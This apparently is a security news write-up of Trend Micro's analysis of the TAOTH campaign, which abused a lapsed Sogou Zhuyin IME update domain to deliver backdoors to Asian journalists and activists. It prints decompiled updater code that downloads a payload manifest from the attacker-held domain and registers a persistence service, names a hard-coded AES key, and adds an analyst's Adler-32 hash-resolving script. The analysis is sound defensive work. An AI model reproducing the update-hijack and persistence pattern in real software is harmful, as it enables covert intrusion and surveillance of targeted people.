In June 2025, a previously undocumented campaign leveraging end-of-support software began surfacing in telemetry data gathered across Eastern Asia. Dubbed TAOTH, the operation exploits an abandoned Chinese input method editor (IME), Sogou Zhuyin, to deliver multiple malware families.
Initial intelligence indicated that victims, primarily traditional Chinese users and dissidents, downloaded what appeared to be legitimate updates before their systems were compromised.
The unexpected revival of a discontinued IME update server enabled threat actors to hijack software distribution and covertly install backdoors, spy tools, and loaders without raising suspicion.
Trend Micro researchers identified a surge in malicious activity when the lapsed domain for Sogou Zhuyin, dormant since mid-2019, began serving a malicious installer as early as November 2024. The compromised updater, ZhuyinUp.exe, connects to a weaponized update configuration endpoint to retrieve the payload manifest.
Infected systems subsequently download one of four distinct malware families—TOSHIS, DESFY, GTELAM, or C6DOOR—each designed for reconnaissance, information theft, persistence, or remote access.
Over several months, hundreds of high-value individuals, including journalists, technology executives, and activists across Taiwan, Hong Kong, Japan, and overseas Taiwanese communities, fell victim to these silent intrusions.
Trend Micro analysts noted that the campaign’s sophistication lies not only in its use of an abandoned software supply chain but also in its multi-stage infection process.
By combining hijacked software updates with spear-phishing operations, the threat actors achieved broad distribution and selective targeting. Victims who clicked on a malicious link or opened a decoy document found their desktops compromised within hours.
Post-infection telemetry revealed additional reconnaissance activities, such as directory enumeration, environment fingerprinting, and secure tunnel creation via legitimate cloud services.
In one key discovery, Trend Micro researchers identified how ZhuyinUp.exe retrieves the malicious update configuration:

```c
// Decompiler pseudocode of the updater (function names are the decompiler's auto-generated labels)
sub_440110(L"https://srv-pc.sogouzhuyin.com/v1/upgrade/version", config_buffer); // fetch the update manifest into config_buffer
wcscpy_s(Destination, 100, L"SOGOU_UPDATER");                                    // service name used later for persistence
sub_419620(Destination, (int)this, flags);                                        // register/start the updater under that name
```
This snippet demonstrates how the updater queries a remote server for the next payload.
The configuration file returned contains URLs, MD5 hashes, and file sizes, enabling the attacker to verify and execute only their crafted binaries.
Infection Mechanism and Persistence
Once the malicious updater launches, the chosen payload—often TOSHIS—patches the entry point of a legitimate executable to inject shellcode.
The loader calculates API function hashes using an Adler-32 algorithm, then downloads and decrypts the final backdoor payload with a hard-coded AES key (qazxswedcvfrtgbn).
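As an added illustration (not code from the Trend Micro report or from the malware), the following Python builds an Adler-32 lookup table over a constructed list of Windows API names so an analyst can map hash constants found in a loader sample back to the API they resolve. The page does not state which byte encoding the loader hashes, so three variants are assumed.

```python
import zlib

# Constructed sample of API names an analyst might expect a loader to resolve.
# Real triage would feed the export list dumped from kernel32.dll, ntdll.dll, etc.
API_NAMES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateThread", "WriteProcessMemory", "CreateServiceW", "StartServiceW",
]


def adler32_variants(name: str) -> dict:
    """Adler-32 of an API name under several encodings.

    Which variant the TAOTH loader actually uses is not stated on the page;
    these three are assumptions to cover the common choices.
    """
    raw = name.encode("ascii")
    return {
        "ascii": zlib.adler32(raw) & 0xFFFFFFFF,
        "ascii_nul": zlib.adler32(raw + b"\x00") & 0xFFFFFFFF,  # C string incl. terminator
        "utf16le": zlib.adler32(name.encode("utf-16-le")) & 0xFFFFFFFF,  # wide string
    }


def build_table(names):
    """Map every hash value to the (name, variant) pairs that produce it."""
    table = {}
    for n in names:
        for variant, h in adler32_variants(n).items():
            table.setdefault(h, []).append((n, variant))
    return table


def resolve(hashes, names=API_NAMES):
    """Resolve hash constants pulled from a sample; unknown hashes map to []."""
    table = build_table(names)
    return {h: table.get(h, []) for h in hashes}


if __name__ == "__main__":
    # Adler-32 of the ASCII string "VirtualAlloc" is 0x1F7004D3
    for h, hits in resolve([0x1F7004D3, 0xDEADBEEF]).items():
        print(f"{h:#010x} -> {hits or 'unresolved'}")
```

Hash constants that stay unresolved usually mean a different encoding, a salted variant, or an export not in the wordlist, so widen the list before assuming a custom algorithm.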
In the case of C6DOOR, the Go-based backdoor supports HTTP and WebSocket communication and allows operators to execute shellcode, capture screenshots, and transfer files via SFTP.
To maintain persistence, the malware registers a service named “SOGOU_UPDATER” under the LocalSystem account, ensuring that the compromised IME re-invokes the update routine on each system start.
By abusing native Windows update mechanisms and embedding itself in trusted processes, TAOTH remains highly stealthy, evading most traditional endpoint defenses.